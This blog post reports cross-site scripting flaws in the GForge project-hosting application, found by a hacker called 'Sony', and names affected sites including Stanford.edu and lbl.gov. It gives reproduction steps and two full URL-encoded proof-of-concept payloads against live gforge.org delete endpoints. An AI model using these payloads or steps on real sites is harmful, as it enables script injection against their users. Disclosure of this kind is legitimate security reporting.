XSS in Gforge App ; Joomlacode.org, Stanford.edu,lbl.gov,etc.affected

Hacker "Sony" discovered Cross site scripting vulnerability in the GForge web Application. GForge is a free software fork of the web-based project-management and collaboration software originally created for SourceForge, called Savane. GForge provides project hosting, version control (CVS and Subversion), bug-tracking, and messaging.

Hacker made two accounts for testing and discovered XSS in the files,calendar,messagewall (search users), blogs..

The Vulnerability Description:

XSS using Files:
After creating fake account, upload your file.

It will available in this location:
http://gforge.org/gf/user/eleo/userfiles/

And press button delete and open link in the new window and add in the url our xss.

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[our xss is here]

Poc:
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

XSS in Calendar:

Open calendar and press button "add new event" and press button delete and open link in the new window and add in the url our xss.

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[our xss is here]

Poc:

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

The vulnerability affects the following sites: Joomlacode.org,Stanford.edu,lbl.gov,umich.edu, and other sites that using Gforge app.

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

XSS in Gforge App ; Joomlacode.org, Stanford.edu,lbl.gov,etc.affected

Fake Microsoft Office Add-Ins Targeting Crypto Transactions

WhatsApp Windows Vulnerability CVE-2025-30401 Could Let Hackers Deliver Malware via Fake Images

Building Smarter AI Through Targeted Training

New Virus Spreading Through YouTube Puts Windows Users at Risk

FBI Operated ElonmuskWHM: Undercover Money Laundering Site That Handled $90M in Crypto

Footer About

Also Read

AI Technology is Helping Criminal Groups Grow Stronger in Europe, Europol Warns

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

Menu Item

Next

Newer Post

Previous

Older Post

Breaking News

Vulnerability

Web Application Vulnerability

XSS Vulnerability

No Related Post Found

Fake Microsoft Office Add-Ins Targeting Crypto Transactions

WhatsApp Windows Vulnerability CVE-2025-30401 Could Let Hackers Deliver Malware via Fake Images

Building Smarter AI Through Targeted Training

New Virus Spreading Through YouTube Puts Windows Users at Risk

FBI Operated ElonmuskWHM: Undercover Money Laundering Site That Handled $90M in Crypto

Also Read

AI Technology is Helping Criminal Groups Grow Stronger in Europe, Europol Warns